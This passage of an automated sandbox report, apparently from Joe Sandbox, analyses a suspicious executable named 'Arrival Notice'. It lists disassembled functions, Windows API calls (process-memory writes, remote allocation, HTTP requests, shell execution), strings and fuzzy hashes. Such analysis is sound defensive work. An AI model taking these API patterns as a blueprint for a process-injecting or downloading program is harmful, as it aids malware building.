Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 4247068974-0
Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669

Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

), xrefs: 0044F409
U, xrefs: 0044FB88
\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: )$U$\
API String ID: 0-3705770531
Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15

Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9

CoInitialize.OLE32(00000000), ref: 0046E505
CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
CoUninitialize.OLE32 ref: 0046E53D

Strings

.lnk, xrefs: 0046E4D8, 0046E4F5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6

Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044EA00

Strings

\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A

Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044EA00

Strings

\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A

Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044EA00

Strings

\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A

Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 708495834-557222456
Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B

Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF

Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E

Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF

Strings

@, xrefs: 004366F8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65

Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011

Strings

\, xrefs: 0044D061
], xrefs: 0044F138
h, xrefs: 0044F78E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: \$]$h
API String ID: 4104443479-3262404753
Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55

Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00457D67

Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182

CloseHandle.KERNEL32(?), ref: 00457E09

Strings

<, xrefs: 00457D2E
@, xrefs: 00457D35

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CloseExecuteHandleShell_wcscpy_wcslen
String ID: <$@
API String ID: 2417854910-1426351568
Opcode ID: 1aa1fbc85180a380a9b3b8a5554333435a2b081482e0f653ddbe988ea1281896
Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
Opcode Fuzzy Hash: 1aa1fbc85180a380a9b3b8a5554333435a2b081482e0f653ddbe988ea1281896
Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94

Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901

Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1

Strings

, xrefs: 0044A8FA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
String ID:
API String ID: 3705125965-3916222277
Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC

Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 0045FAC4
DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68

Strings

0, xrefs: 0045FAA1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6

Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
GetWindowLongW.USER32(?,000000F0), ref: 0045087D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E

Strings

SysTreeView32, xrefs: 0045082E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8

Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00434B10
GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
FreeLibrary.KERNEL32(?), ref: 00434B9F

Strings

AU3_GetPluginDetails, xrefs: 00434B82

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: AU3_GetPluginDetails
API String ID: 145871493-4132174516
Opcode ID: a732767565c191af3f32d00edcd54a30abdc686136f50d1932ac62ef5a53304e
Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
Opcode Fuzzy Hash: a732767565c191af3f32d00edcd54a30abdc686136f50d1932ac62ef5a53304e
Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95

Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E

Strings

SysMonthCal32, xrefs: 00450DC6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64

Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00450A2F

Strings

msctls_updown32, xrefs: 00450A12

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DestroyWindow
String ID: msctls_updown32
API String ID: 3375834691-2298589950
Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8

Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044DAD9
_memmove.LIBCMT ref: 0044DAE8

Strings

, xrefs: 0044DC1A
<, xrefs: 0044DC13

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove
String ID: $<
API String ID: 4104443479-428540627
